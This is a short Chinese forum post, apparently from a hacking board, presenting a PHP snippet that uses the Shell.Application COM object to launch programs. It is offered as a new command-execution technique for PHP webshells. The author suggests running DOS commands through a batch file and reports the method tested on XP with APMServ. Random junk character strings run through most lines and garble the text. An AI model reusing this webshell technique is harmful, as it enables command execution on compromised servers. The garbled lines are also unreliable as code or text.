关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。$ I. i4 O% z" V- D, n0 d/ w
1 m9 O0 @7 n7 x5 X- `1 b0 C* W
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法# I/ ^7 M3 H2 T3 ]
) A: R" m. y& X1 |; I2 x
<?php
j, @4 I& f$ P- l: M- T, H! M$wsh = new COM('Shell.Application') or die("Shell.Application");
+ U& ^' P+ X" \/ L# f2 e $exec = $wsh->open("c:\\windows\\system32\\notepad.exe");0 Q5 X% w& ^; v& L$ Y
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。$ y! b" Y; T' f; h: p/ ^9 }
?>
* w3 a! `0 p& B- \ h4 h
; T$ ^0 n0 s; i1 S! d5 Vxp+APMServ5.2.0测试通过。$ `% r# A" Y" t: t. B
|